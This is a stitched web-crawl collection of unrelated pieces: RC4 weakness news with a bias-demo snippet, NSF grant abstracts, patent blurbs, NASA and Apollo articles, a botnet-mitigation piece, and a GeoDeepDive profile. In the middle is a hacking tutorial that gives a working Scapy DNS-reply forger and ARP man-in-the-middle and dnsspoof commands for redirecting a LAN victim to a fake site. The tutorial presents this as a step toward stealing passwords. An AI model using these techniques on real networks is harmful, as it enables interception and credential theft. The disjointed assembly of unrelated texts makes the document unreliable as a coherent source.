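            out.append(S[(S[i] + S[j]) % 256])
        return out

    trials = 100_000                                  # takes a minute or two
    zeros = sum(rc4_keystream(list(os.urandom(16)), 2)[1] == 0
                for _ in range(trials))
    print(zeros / trials)   # about 0.0078 (1/128), not the ideal 0.0039 (1/256)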
The vulnerability has wide-ranging repercussions, given current RC4 use. "Around 50% of all TLS traffic is currently protected using the RC4 algorithm," they said. "It has become increasingly popular because of recent attacks on CBC-mode encryption on TLS, and is now recommended by many commentators." Those CBC-mode encryption attacks have included padding oracle attacks, the BEAST attack against browsers and the Lucky 13 attack that was first disclosed last month.
Some cryptography experts have moved to reassure Internet users that they're in no immediate danger from the RC4 vulnerabilities. "While interesting, the attacks don't represent an immediate practical threat to users of SSL/TLS (including online banking, e-commerce, social networking, etc.)," said Symantec technical director Rick Andrews in a blog posted to the Certificate Authority Security Council website. "Such attacks require an attacker to run malicious software on a user's computer, which would connect to a particular website and send the same message over and over again many times. In fact, if the attacker's software could send the same message over and over 10 times per second, it would still take more than three years for the attack to succeed."
Still, once easily exploitable vulnerabilities have been discovered in an encryption algorithm, it's only a matter of time before more rapid and effective attack techniques get discovered. Furthermore, other researchers -- working at intelligence agencies, for example -- could have already discovered these vulnerabilities and put them to use.
"RC4 shouldn't be around," said Paul Ducklin, head of technology for Sophos in the Asia Pacific region, in a blog post. "Experts have recommended avoiding it completely, at least for any newly written applications, for several years. But replacing or banning RC4 in existing cryptographic implementations is a much trickier problem."
What's the solution? "The most effective countermeasure against our attack is to stop using RC4 in TLS," according to the researchers. "There are other, less-effective countermeasures against our attacks and we are working with a number of TLS software developers to prepare patches and security advisories."
Instead of using RC4, the researchers strongly recommend switching to AEAD cipher suites such as AES-GCM, which are supported in TLS 1.2, a version that hasn't yet been widely adopted. Another approach, however, could be to use a CBC-mode cipher suite that's been patched against the BEAST and Lucky 13 attacks, and they said many versions of TLS 1.0 and 1.1 do now have such patches.
Symantec's Andrews also emphasized that the discovery of vulnerabilities in RC4 doesn't reveal weaknesses in SSL/TLS. "The designers of the SSL/TLS protocol anticipated that algorithms would become weaker over time, so the protocol was designed to support the easy addition of new algorithms," he said. "Hence a weakness in one algorithm does not mean that SSL/TLS is broken. Newer, stronger algorithms have already been developed and incorporated into the latest implementations of SSL/TLS. What's needed now is for users of Web server and browser software to update to the newest versions to minimize or eliminate the use of weakened algorithms." | <urn:uuid:bba81bc6-686c-467f-a57b-af7a715ed042> | CC-MAIN-2017-09 | http://www.darkreading.com/risk-management/https-security-encryption-flaws-found/d/d-id/1109137?cid=sbx_byte_related_mostpopular_byte_news_apple_motion_to_ban_samsung_products_den&itc=sbx_byte_related_mostpopular_byte_news_apple_motion_to_ban_samsung_products_den | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00481-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.952074 | 1,008 | 3 | 3 |
Agency: NSF | Branch: Standard Grant | Program: | Phase: DISCOVERY RESEARCH K-12 | Award Amount: 449.97K | Year: 2013
Inquiry Primed: An Intervention to Mitigate the Effects of Stereotype Threat is an Exploratory Project in the Teacher Strand of DRK-12 that investigates stereotype threat at the classroom level and in the context of inquiry-based instruction, in order to develop strategies and a related professional development course, using the principles of Universal Design for Learning, to help teachers learn how to mitigate stereotype threat.
The project includes three major activities:
1) An experimental study testing the hypothesis that the influences of stereotype threat on individual students affects instructional processes for the class as a whole: Research participants include three teachers from 3 different school districts in Massachusetts, each with four 8th grade science classes, for a total sample of 12 science classes and approximately 300 students. The two treatment conditions (stereotype threat induced vs. not induced) are applied blindly to three classroom groups over a series of six lessons. The project uses existing surveys for gathering data, including Communicative Interactions, RTOP subscales, subscales of the Constructivist Learning Environment Survey (CLES), and a brief student questionnaire measuring domain salience (e.g., self ranking of degree of participation in class). The analysis is conducted using Ordinary Least Squares (OLS) regression, with predictions of classroom instructional processes based on treatment condition, percentage of students in stereotyped group, and domain salience.
2) Collaboration with teachers as co-researchers to translate research findings into classroom practices and a prototype online professional development course: Three middle school teachers who participated in Study 1 serve as co-researchers, using the Universal Design for Learning model. The product is a set of prototype online professional development modules that include self-paced presentations, small group facilitated discussions, asynchronous discussions, and live webcasts with experts, all focused on how teachers can implement strategies to mitigate stereotype threat in their practice. The design elements will be assessed in terms of clarity, accessibility, use, value, and promise.
3) Pilot testing of three professional development modules: The professional development component (via communities of practice) supports classroom teachers as they incorporate these strategies into their daily activities. The three teachers involved in the original study and design of modules participate in a six-week pilot study of the online professional development course, anticipated to consist of three modules, with teachers participating 3-4 hours per week. The course is evaluated through observations of professional development interactions (synchronous and asynchronous), interviews, implementation strategies, Moodle Electronic Usage Logs, online discussions, and a questionnaire. Descriptive statistics and regression analysis are used to seek predictors of use and contributions by teacher characteristics.
The project contributes critical knowledge about stereotype threat, a construct shown to contribute to disparities in achievement in STEM education. The outcomes of the project will include research findings that are to be submitted to science education research journals for publication; a prototype, online teacher professional development course on mitigating stereotype threat in STEM education classrooms; and dissemination of the course to teachers who are part of the CAST and Minority Student Achievement Networks.
Agency: NSF | Branch: Standard Grant | Program: | Phase: RES IN DISABILITIES ED | Award Amount: 367.71K | Year: 2013
The purpose of this empirical study is to explore the prevalence and impact of stigmatization and stereotype threat on mathematics performance among public high school students (grades 9-12) with specific learning disabilities. Using a combination of self-report measures and experimental study, the following questions will be addressed: 1) To what degree are high school students with specific learning disabilities conscious of stigma related to their learning disability in the context of mathematics education?, 2) Is greater stigma consciousness associated with poorer performance in mathematics among high school students with specific learning disabilities?, and 3) Do high school students with specific learning disabilities experience stereotype threat that interferes with performance in mathematics? The severity of learning disability will be controlled in all analyses, and tests of moderation will be employed to explore potentially compounding effects of having a math specific learning disability, being a girl or minority student, or coming from a school where stigma levels around learning disability are high.
The proposed work contributes to Intellectual Merit through advancing potentially transformative knowledge and understanding about the experiences of students with learning disabilities in the context of high school mathematics. The research has the potential to inform and open new avenues of research in the area of stigmatization and stereotype threat for people with disabilities.
In regards to Broader Impacts, the findings from this project will significantly inform understanding of the achievement gaps in math of underrepresented groups, and specifically students with learning disabilities, including women and minorities within this population. Understanding the cognitive and affective experiences of individuals with learning disabilities may facilitate the future development of interventions to remedy the current negative outcomes of students with learning disabilities in mathematics.
CAST Inc | Date: 2013-10-31
A matrix band, including a straight, contoured or sectional matrix band for use in dentistry, is described. The matrix band includes a metal or metal alloy strip constructed from titanium, titanium alloy or stainless steel plated with titanium or titanium alloy, which initiates coagulation of the blood, while the polymer coating eliminates capillary action between a tooth and the matrix band while the tooth is being filled.
CAST Inc | Date: 2013-10-30
A matrix band for use in dentistry has a silicone-based, polymer coating applied to a stainless steel or a polyester surface, which reduces or eliminates capillary action between a tooth and the matrix band. The matrix band may include at least one aperture to assist with removal of the matrix band from the tooth.
CAST Inc | Date: 2014-01-21
A system and method for forming a wall is disclosed. In some embodiments, the wall comprises blocks having internal couplers configured for use with rods which can be inserted through and which are configured to securely lock blocks together. In some embodiments, the rods which are inserted into internal couplers may be threaded or have another locking features such that the blocks in a wall can be securely fastened together. | <urn:uuid:390ed9f7-c32a-43a5-b490-2ba48c1a4218> | CC-MAIN-2017-09 | https://www.linknovate.com/affiliation/cast-inc-512806/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173866.98/warc/CC-MAIN-20170219104613-00005-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.922991 | 1,276 | 2.65625 | 3 |
Welcome back, my fellow hackers! There have been some articles I've been wanting to write regarding social engineering, more specifically, stealing passwords. But in order to do that, there are some basic concepts and methods we need to have a grasp of. The first of these concepts is the Man in the Middle attack. Since we've already covered that, we're going to cover the next concept, DNS spoofing. First, we'll cover what DNS is exactly, then we'll quickly discuss the anatomy of the DNS spoofing attack, and finally, we'll perform the attack! So, let's get started!
What is DNS?
This question is actually fairly simple. DNS stands for Domain Name System. You know how when you go to a website using a browser, you type in a URL instead of the IP address of the server? That's DNS working its magic! DNS keeps track of which IP addresses reside at which URLs, so we don't have to remember the addresses, just the URLs! Pretty neat, huh? Like I said, DNS is fairly simple, so let's move on to the next part, the anatomy of a DNS spoofing attack.
Anatomy of a DNS Spoofing Attack
Since this can be a bit difficult to talk about without a reference, we’re going to be dissecting this attack based on this diagram:
As we can see here, the attacker starts by pretending to be the DNS server. Then, when the victim requests the address for the desired site, the fake server responds with whatever address the attacker wants, which in this case, directs the victim to a fake site. This attack is very simple, but can often play a part in a larger attack. Now that we know the ins and outs of DNS spoofing, let’s perform it ourselves!
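Before turning to the ready-made tools used below, it may help to see just how small a forged DNS answer really is. The Python/Scapy sketch that follows is an illustration only, with assumed values for the hostname and address; it is not the dnsspoof tool this walkthrough uses.

    # Sketch of a DNS spoofer: watch for queries for one hostname and answer
    # them with an attacker-chosen address before the real server can.
    from scapy.all import IP, UDP, DNS, DNSRR, sniff, send

    FAKE_IP = "10.0.0.16"               # address we want the victim to receive
    TARGET = "www.hackingloops.com"     # hostname whose lookups we hijack

    def forge_reply(pkt):
        if not (pkt.haslayer(DNS) and pkt[DNS].qr == 0 and pkt[DNS].qd is not None):
            return                                   # not a DNS query
        if TARGET not in pkt[DNS].qd.qname.decode():
            return                                   # not the hostname we care about
        reply = (IP(src=pkt[IP].dst, dst=pkt[IP].src) /
                 UDP(sport=53, dport=pkt[UDP].sport) /
                 DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,
                     an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=60, rdata=FAKE_IP)))
        send(reply, verbose=0)

    sniff(filter="udp port 53", prn=forge_reply)     # requires root privileges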
Performing a DNS Spoofing Attack
Setting up the Attack
Before we really get started, there are a couple of things that we need to prepare. Namely, we need to prepare the fake website, and set up the configuration file for the DNS spoofing tool.
Let’s start by setting up the website. First, we’ll whip up some basic HTML code so we actually have a site. We’ll be using gedit. The proper file can be opened with the following command:
Now that we have our file open, just go ahead and erase everything in it. I’ll be replacing it with the following:
Feel free to replace the words with whatever you like; as long as you follow the HTML tags, everything should be fine.
Now that we have our website’s HTML code ready, we can go ahead and start the server that will serve the website. We’ll just be using the pre-installed Apache2 webserver, which can be started with the following command:
Now that we have the site up and running, we need to quickly edit the configuration file for the DNS spoofing tool. We’re just going to be modifying the /etc/hosts file and using it for our attack. We can open the file with the same command we used previously, but with the new file path. Once we have the file open, we can set up the file to tell the spoofing tool what sites we want to spoof. Before we do that, we need to know our local IP address, which we can find with the ifconfig command:
We can see that our local IP address is 10.0.0.16. Now that we know it, we can edit the file. We're just going to be adding a single line that maps the target site to our address, along these lines:

    10.0.0.16    www.hackingloops.com

The line we added will tell the spoofing tool that we want www.hackingloops.com to be redirected to our local IP address, which will then serve them our website instead of the real one! That's it for the setup; now it's time to execute the attack!
Executing the Attack
Now, if we’re going to be redirecting traffic that isn’t ours, we need to be able to read it. This is where the Man in the Middle Attack comes into play. We’re going to place ourselves between the victim and the gateway, so that all of the victim’s DNS requests have to go through us. We can then sniff these requests and redirect them with our spoofed responses! To start, we need to know the gateway’s IP address, which we can find with the route command with the -n flag:
We can see by the above output that the address of the gateway is 10.0.0.1. For the sake of keeping this relatively short, we already have our victim’s address, which is 10.0.0.13. Note that all these addresses are on the same network. This form of DNS spoofing only works if the victim is on your LAN. Now that we have the addresses, we can start the Man in the Middle attack (finally)! We’re going to be using arpspoof for this attack, and we’ll be using the -i, -t, and -r flags to specify the interface to attack on and the addresses to attack:
Once we execute this, the MitM will start.
DO NOT FORGET: You must enable IP forwarding, so the data from the victim doesn’t get hung up on the attacking system. This can be done with this command: echo 1 > /proc/sys/net/ipv4/ip_forward
Now that we have our MitM running, we should have all the victim’s traffic flowing through the attacker system. Since we can see all this traffic, we can start the DNS spoofing tool (dnsspoof) to listen for DNS requests for www.hackingloops.com and respond to them with our IP address! Let’s go ahead and start dnsspoof now. We use the -i flag for giving an interface, and the -f flag for giving the path to the hosts file. The command to start the attack should look something like this:
We can see that dnsspoof is now listening for UDP traffic on port 53 (port 53 is the DNS port, and UDP is the transport protocol DNS uses) from all address but our own! Now that our attack is up and running, let’s move over to our victim PC and try and access www.hackingloops.com from a web browser:
Now, before we celebrate, let’s look back at dnsspoof to see the output:
There we have it! We were able to start a Man in the Middle attack, and use it to perform a DNS spoofing attack, which redirected a legitimate request for www.hackingloops.com to our fake website!
There are multiple reasons for this article. For one, we’ll be needing these attacks very soon in order to steal passwords from an unsuspecting user. Secondly, it’s a proof of concept of sorts. It shows that these smaller attacks (MitM, DNS spoofing, etc.) aren’t just one trick ponies. We can combine these attacks to achieve even greater things. Many times, when performing an actual hack, you will need to combine many different kinds of attacks at once to achieve a goal, this just proves that. I’ll see you next time! | <urn:uuid:ead83764-496e-4d3f-a555-c6f62c3dd699> | CC-MAIN-2017-09 | https://www.hackingloops.com/tag/man-in-the-middle/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00425-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.928587 | 1,576 | 3.015625 | 3 |
The second commercial venture to ink a deal with NASA to run resupply missions to International Space Station successfully docked at the orbiting facility on Sunday.
Astronauts on the space station used a robotic arm to grab hold of the Cygnus cargo spacecraft, built and operated by Orbital Sciences, as it approached the station. Cygnus, carrying 1,300 pounds of food, clothing and experiments, docked at the station at 8:44 a.m. EDT on Sunday after an 11-day journey.
The hatch on the spacecraft is set to be opened on Monday, and the unloading will begin.
"With the successful berthing of the Orbital Sciences Cygnus cargo module to the [space station], we have expanded America's capability for reliably transporting cargo to low-Earth orbit," said NASA Administrator Charles Bolden, in a statement. "It is an historic milestone as this second commercial partner's demonstration mission reaches the [station], and I congratulate Orbital Sciences and the NASA team that worked alongside them to make it happen."
Orbital Sciences joins SpaceX among the private companies working with NASA to send cargo to the space station and bring finished experiments and refuse back to Earth. At some point, these commercial craft are expected to become space taxis, ferrying astronauts back and forth to the station.
SpaceX, the first commercial venture to send a spacecraft to the space station, launched a test flight in 2012 and has been approved to run regular resupply missions.
With Sunday's successful docking, Orbital Sciences now has the same deal.
Now that the long-running space shuttle fleet is retired, NASA is dependent on a young commercial space industry to fly missions to the space station.
At this point, NASA astronauts are flying to the space station on Russian Soyuz rockets. The space agency expects that commercial flights, once they gain more experience and accuracy, will take over that job for NASA.
With commercial companies focusing on near-Earth missions, NASA is working on robotics and heavy-lift engines that should get human explorers to the moon, Mars and asteroids.
"Orbital joins SpaceX in fulfilling the promise of American innovation to maintain America's leadership in space," said Bolden. "As commercial partners demonstrate their new systems for reaching the station, we at NASA continue to focus on the technologies to reach an asteroid and Mars.
"Under President Obama's leadership, the nation is embarking upon an ambitious exploration program that will take us farther into space than we have ever traveled before, while helping create good-paying jobs right here in the United States and inspiring the next generation," he added.
Orbital Sciences's Cygnus was launched on the company's Antares rocket on Sept. 18 from NASA's Wallops Flight Facility in Virginia.
The capsule originally had been set to rendezvous with the space station, which flies about 260 miles above Earth, on Sunday, Sept. 22 - a full week before it did dock with the station.
That planned rendezvous was postponed, however, after engineers discovered a data format mismatch between an onboard space station navigation system and a similar system on Cygnus. The Orbital Sciences team quickly developed and uploaded a software fix.
Once the glitch was repaired, Cygnus' rendezvous with the station was pushed to Sunday so it wouldn't interfere with arrival of three new space station crew members last Wednesday.
Cygnus is scheduled to remain attached to Harmony until Oct. 22. After that, the capsule, carrying refuse from the station, will burn up on re-entry in Earth's atmosphere.
This story, "NASA doubles commercial fleet after successful Cygnus docking" was originally published by Computerworld. | <urn:uuid:7b292d13-6356-4101-a5cc-6557971bf200> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2170366/data-center/nasa-doubles-commercial-fleet-after-successful-cygnus-docking.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171166.18/warc/CC-MAIN-20170219104611-00649-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.951316 | 750 | 2.734375 | 3 |
The 20th of this month will be the 40th anniversary of the first Moon landing, Apollo 11, which famously took Neil Armstrong and Buzz Aldrin on man's first Moon walk. The Lunar Excursion Module (LEM) was fundamentally a simple machine which was designed to fall to the Moon rather than fly, with one giant rocket motor underneath and some smaller attitude thrusters that allowed the spacecraft to be rotated so that the main engine could potentially point in any direction when it fired. Control of the descent was therefore by means of a number of rocket engine "burns" that could slow the fall of the LEM. This certainly is a "brute force" method of flying; as with Earth flying machines like a helicopter or the Harrier jet, if you have a powerful enough engine it's possible to bludgeon the laws of physics into submission.
Later on (in the late 1970’s), the idea of landing the LEM inspired a series of popular computer games, probably most famously the “Lunar Lander” arcade game from Atari. I first saw versions of lunar lander in the early 1970s, running on programmable calculators, and specifically the Science of Cambridge MK14 (an early single-board microcomputer), the first computer that I ever programmed. In the computer game, the program modelled the amount of fuel in the craft, the altitude and the speed, and of course the moon’s gravitational pull of 1.6N/kg. By pressing a button you could “burn”, which used fuel and slowed descent. If you studied Physics or Applied Maths at school you would have had the formulae needed to create this program, and you could even do the necessary calculations by hand. Where the computer becomes important is in the dynamic nature of the calculations: as you burn fuel, the mass of the craft decreases, and therefore the force of the engine creates more acceleration as the flight continues.
The real LEM had a dry weight of around 4000kg, with another 11,000kg of fuel at the start of the flight, and the descent started from a height of 15km. Unlike the game of course, the Apollo 11 descent had two men’s lives depending on the outcome, and the flight did not go smoothly. Armstrong famously landed the LEM (codenamed “Eagle”) with only a few seconds of fuel left in the tank, after deciding that the landing site was too rocky and deciding to fly along the surface for a while, looking for a new site. If you’ve ever played “Lunar Lander”, you’ll know that flying along at constant height is a very expensive operation in terms of fuel, so this is a high-risk strategy.
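For a sense of how little code those lander games actually needed, here is a minimal descent loop in Python using the LEM figures above. The thrust, burn rate and the crude "burn at the last moment" autopilot are rough assumptions for illustration, not Apollo engineering data.

    # Toy lunar-descent loop in the spirit of the old Lunar Lander games.
    # Dry mass, fuel load and starting altitude come from the article; the
    # engine figures below are assumed round numbers.
    GRAVITY = 1.6            # m/s^2, lunar surface gravity
    DRY_MASS = 4000.0        # kg
    THRUST = 45000.0         # N while burning (assumed)
    BURN_RATE = 15.0         # kg of fuel per second at full throttle (assumed)

    fuel, altitude, velocity, t, dt = 11000.0, 15000.0, 0.0, 0.0, 0.1

    while altitude > 0:
        mass = DRY_MASS + fuel
        decel = THRUST / mass - GRAVITY       # net deceleration while burning
        falling = velocity < 0
        # burn only once the remaining altitude is just enough to kill our speed
        burn = falling and fuel > 0 and velocity ** 2 / (2 * decel) >= altitude
        accel = -GRAVITY + (THRUST / mass if burn else 0.0)
        velocity += accel * dt
        altitude += velocity * dt
        if burn:
            fuel = max(0.0, fuel - BURN_RATE * dt)
        t += dt

    print(f"touchdown at t={t:.0f}s, speed={-velocity:.1f} m/s, fuel left={fuel:.0f} kg")

As in the arcade version, hovering or flying sideways to hunt for a better landing spot burns through the fuel margin very quickly, which is exactly the corner Armstrong flew himself into.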
The LEM also experienced some computer problems during the short flight, with the Apollo Guidance Computer giving "program alarm 1202" repeatedly, causing Armstrong to ask Mission Control whether he should abort the landing. In subsequent analysis, the experts from MIT concluded that the computer overloaded because of the data coming from both the rendezvous radar and the ground radar at the same time. The boffins imagined that only the ground radar would be on during the descent (to give accurate height readings), while the rendezvous radar would be used after takeoff. Armstrong, being a test pilot, was planning for possible emergencies, and if the landing should be aborted, he wanted to be able to find "Columbia" (the command/service module) as quickly as possible as they burned away from the Moon's surface. You might say that the user exercised that software in a way that the programmers had not foreseen, a problem that's still all too common in software engineering today.
I would like to think that with today's technology it would be much easier to go to the Moon: we have faster, smaller computers; superior materials like plastics and carbon fibre; more sophisticated fuels and engine technologies. Certainly the one thing that hasn't changed in the last 40 years is the courage that it would take to land on the Moon, and we have to pay tribute to the 12 men that have done it.
For those interested, check this link out: http://wechoosethemoon.org/
It recreates the Apollo 11 launch and moonlanding in a real time interactive website to celebrate the 40th anniversary. | <urn:uuid:4d1eff76-8ca2-45e0-b6bd-ec727465292c> | CC-MAIN-2017-09 | http://www.dialogic.com/den/developers/b/developers-blog/archive/2009/07/09/moon-40.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.84/warc/CC-MAIN-20170219104611-00173-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.959341 | 918 | 3.734375 | 4 |
A single malicious botnet can harness enough machines to take down key Internet infrastructure and create financial havoc. Millions of computers on the Internet can be compromised. But there are measures that network managers can take to mitigate these botnet threats, using many of the tools already available to help prevent attacks. Here, Knowledge Center contributor Darren Grabowski discusses the impact of these silent botnet threats and offers solutions that network managers can use to mitigate these botnet threats.
The Internet is in the midst of a global network pandemic, with millions of computers on the Internet compromised in some fashion. It is estimated that the number of recent malware infections on the Internet is over 7 million, and over 70 percent of all e-mail messages are spam. It is also believed that 85 percent of spam comes from just six botnets. It was recently reported that there is an average of ten million active botnet members on any given day, and that botnets are winning the spam war.
These types of high-profile security threats receive significant publicity. However, another threat, a silent one, centers around low-bandwidth consumption, compared to legitimate traffic on a network. A large number of compromised machines, if directed by a malicious botnet, can take down key Internet infrastructure.
The compromised machines can also be used for other harmful activities that could cause a severe financial impact (that is, phishing). According to a recent survey, 3.6 million adults have lost money in phishing schemes, resulting in an estimated loss of $3.2 billion. Phishing is only one part of the problem. Attacks have already caused issues for countries such as Estonia and infrastructure such as the Domain Name System (DNS).
To help mitigate this threat, one of the many tools used is a darknet. According to Team Cymru's Darknet Project, a darknet is "a portion of routed, allocated IP space in which no active services or servers reside. These are 'dark' because there is, seemingly, nothing within these networks." In short, there should be no reason for any traffic to enter this space.
Actually, there is one server in a darknet which collects entering packets. This data can be used for immediate action or stored for further analysis. The levels of nefarious traffic from this silent threat are low compared to legitimate traffic, so many network operators may choose to ignore the traffic or they may not even realize the silent threat hiding in their legitimate traffic.
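That collection server needs very little machinery. The Python/Scapy sketch below gives the flavor; the dark prefix and output file are assumed placeholder values, not a recommendation for any particular network.

    # Sketch of a darknet collector: log anything addressed to an unused,
    # routed prefix.  The prefix and file name are assumed placeholders.
    from scapy.all import sniff, IP
    import csv, time

    DARK_PREFIX = "192.0.2."        # an otherwise unused /24 routed to this box

    with open("darknet_hits.csv", "a", newline="") as f:
        log = csv.writer(f)

        def record(pkt):
            if IP in pkt and pkt[IP].dst.startswith(DARK_PREFIX):
                log.writerow([time.time(), pkt[IP].src, pkt[IP].dst, pkt[IP].proto])
                f.flush()

        sniff(prn=record, store=False)    # requires root privileges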
Most users and operators know a problem exists, but few are in a position to see how big the problem is. Solutions are simple: the right tools, dedicated staff and cooperation. Implementation is the most difficult part. Networks large and small must work together to mitigate this threat.
What can be done to mitigate this threat?
We are not going to rid the Internet of compromised machines. That does not mean the problem should be ignored or that we can't mitigate it. What we need to do is reduce the capability of botnets, which means reducing the number of infected machines. Networks of all sizes can assist by properly monitoring their networks and removing infected machines.
Tools exist to monitor traffic at relatively low cost. A darknet, or any other similar monitoring device, allows networks to find potentially compromised machines by watching their IP space. Some monitoring devices can be deployed at a relatively low cost using existing hardware or using data from existing intrusion detection systems. Let's look at some solutions:
Solution No. 1: Use scripts and NetFlow data
Using some scripts and NetFlow data, you can monitor your network for activities such as denial of service (DoS) attacks. IP addresses participating in a DoS attack can be investigated a bit further. By combining data from a DoS attack or a darknet and other sources (such as greylisting or spam traps), you can potentially find a botnet member.
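That combining step can be as simple as intersecting address lists. The Python sketch below uses invented file names and formats purely for illustration: each sensor contributes a set of suspect addresses, and anything seen by more than one sensor goes on the shortlist.

    # Cross-reference suspect addresses from several sensors; addresses seen
    # by two or more sources are the most promising botnet candidates.
    def load(path):
        with open(path) as f:
            return {line.strip() for line in f if line.strip()}

    darknet   = load("darknet_hits.txt")         # addresses that probed the darknet
    dos_flows = load("netflow_dos_sources.txt")  # sources seen in a DoS flood
    spam_trap = load("spamtrap_sources.txt")     # addresses that hit a spam trap

    sources = (darknet, dos_flows, spam_trap)
    suspects = {ip for ip in darknet | dos_flows | spam_trap
                if sum(ip in s for s in sources) >= 2}
    for ip in sorted(suspects):
        print(ip, "seen by", sum(ip in s for s in sources), "sensors")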
Once suspicious hosts are located, you can check to see if these hosts are communicating with a common host-which could be a command-and-control (C&C) server. Taking down a C&C server can disrupt a botnet, even for a short while. If the compromised host's owner can be contacted, there may be a chance that a list of bots can be obtained and further notifications can be sent out. | <urn:uuid:1f321369-1294-4067-a622-24a4b1236cd3> | CC-MAIN-2017-09 | http://www.eweek.com/c/a/Security/How-to-Mitigate-the-Increasing-Botnet-Threat | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171834.68/warc/CC-MAIN-20170219104611-00349-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940262 | 873 | 2.84375 | 3 |
The problem with that analysis is that storage performance isn't as simple as bandwidth alone. In this, the first installment in a three-part series, we'll discuss the basic storage performance metrics: throughput, IOPS and latency. In the second installment we'll cover how you have to consider IOPS and latency together; in part three, we'll look at how RAID affects performance.
We tend to concentrate on storage network bandwidth because it's the only performance metric that's right there in the system specs. When you buy a disk array or HBA, you know if it has 4-Gbps Fibre Channel or 10-Gbps Ethernet connections. Network bandwidth defines the absolute maximum throughput a storage system can deliver, but very few of us run into throughput limits with our mission-critical applications.
Throughput is the limiting factor for applications that read and write data sequentially in large chunks. These include many media applications like video editing or surveillance and, of course, backup. Backup appliance performance is all about how quickly the appliance can ingest one or more streams of data from the backup servers. As a result, backup appliance spec sheets prominently list ingest rates.
So, while throughput is important, other than backup most of us don't have mission-critical applications doing large sequential data transfers. The applications we want to run faster are almost always some sort of database that reads and writes data more or less randomly in 4-Kbyte or 8-kbyte pages. A typical database transaction will require tens or hundreds of small data accesses as the database searches an index for the right record in each affected table, reads the record in, and then writes it back out with new data in the fields that the transaction changed.
For databases and other random-access applications, throughput is much less important than I/O latency and the number of I/O operations per second (IOPS) the storage system can perform.
Latency is simply the amount of time a device takes to store or retrieve data. On a spinning disk, total latency is the seek time plus the rotational latency as the drive waits for the right block of data to come under the heads, plus the data transfer time.
In the real world, storage system latency is added as requests travel up and down through the server operating system's I/O stack, cross various network switches and work their way through an array's controller. Synchronous mirroring across data centers is a big source of write latency because data has to be written to both the primary and replication target arrays before the write is acknowledged back to the application. Taken together, these often add enough latency to noticeably affect application performance.
Since today's disk drives have just one head positioner, the number of IOPS a drive can deliver is the reciprocal of its latency. So a 15K RPM drive that has an average total latency of 7 milliseconds can deliver 1/0.007 or 140 IOPS.
SSDs and disk arrays can satisfy some I/O requests from their RAM caches and access their multiple flash chips or disk drives in parallel. This parallelism allows them to deliver more IOPS than their latency would imply. Just as parallelism in storage systems reduces the effect of latency on IOPS, applications making requests in parallel, such as a database server satisfying many requests for many users at the same time, can consume more IOPS than if the application was doing all its work sequentially.
So does it make sense to add SSDs to a storage system with 1-Gbps connections? Sure does, if that storage system is going to run a database application like Oracle, MySQL or even Exchange, all of which manage data in small pages. To saturate even one 1-Gbps connection would take 15,000 8K IOPS, while a 12-drive SATA system without SSD would struggle to deliver 1,500.
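The arithmetic behind both of those figures is easy to reproduce. The short Python snippet below redoes the reciprocal-of-latency calculation and works out how many 8-Kbyte I/Os it takes to fill a 1-Gbps link.

    # IOPS from latency: one head positioner means one outstanding I/O at a time.
    latency_s = 0.007                        # 7 ms average total latency
    print(round(1 / latency_s))              # about 140 IOPS

    # IOPS needed to saturate a 1-Gbps link with 8-Kbyte database pages.
    link_bytes_per_s = 1e9 / 8               # 1 Gbps in bytes per second
    io_size = 8 * 1024                       # 8 KB per I/O
    print(round(link_bytes_per_s / io_size)) # roughly 15,000 IOPS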
Now, Steve does have a point that just sticking a bunch of SSDs into a low-end storage system that doesn't have the CPU, memory or proper software to manage them is a fool's errand.
Performance metrics for some basic storage devices:
|Device||Transfer Rate MBps (Read/Write)||Avg Latency ms (Read/Write)||IOPS (Read/Write)|
|10K RPM Disk||168||7.1||140|
|15K RPM Disk||202||5.1||196|
|Micron P400e SATA MLC SSD||350/140||0.5/3.5||50000/7500|
|Micron P320h PCIe SLC SSD||3200/1900||0.009/0.042||785000/205000| | <urn:uuid:199f1ba3-13ca-47bb-bb4a-d33d23fe7ce0> | CC-MAIN-2017-09 | http://www.networkcomputing.com/storage/ssds-and-understanding-storage-performance-metrics/1349951544 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170696.61/warc/CC-MAIN-20170219104610-00645-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.925815 | 954 | 2.859375 | 3 |
University of Wisconsin geologist Shanan Peters was frustrated by how much he didn’t know.
Most geological discoveries were locked away in troves of research journals so voluminous that he and his colleagues could read only a fraction of them. The sheer magnitude of existing research forced most geologists to limit the scope of their work so they could reasonably grasp what had already been done in the field. Research that received little notice when it was published too often was consigned to oblivion, wasting away in dusty journals, even if it could benefit contemporary scientists.
A decade ago, Peters would have had to accept his field’s human limitations. That’s no longer the case. In the summer of 2012, he teamed up with two University of Wisconsin computer scientists on a project they call GeoDeepDive.
The computer system built by professors Miron Livny and Christopher Re will pore over scanned pages from pre-Internet science journals, generations of websites, archived spreadsheets and video clips to create a database comprising, as nearly as possible, the entire universe of trusted geological data. Ultimately, the system will use contextual clues and technology similar to IBM’s Watson to turn those massive piles of unstructured and often forgotten information—what Livny and Re call “dark data”—into a database that Peters and his colleagues could query with questions such as: How porous is Earth’s crust? How much carbon does it contain? How has that changed over the millennia?
The benefits of GeoDeepDive will be twofold, Peters says. First, it will give researchers a larger collection of data than ever before with which to attack problems in the geosciences. Second, it will allow scientists to broaden their research because they will be able to pose questions to the system that they lack the expertise to answer on their own.
“Some problems were kind of off limits,” Peters says. “You couldn’t really think about reasonably addressing them in a meaningful way in one lifetime. These new tools have that promise—to change the types of questions we’re able to ask and the nature of answers we get.”
Order From Chaos
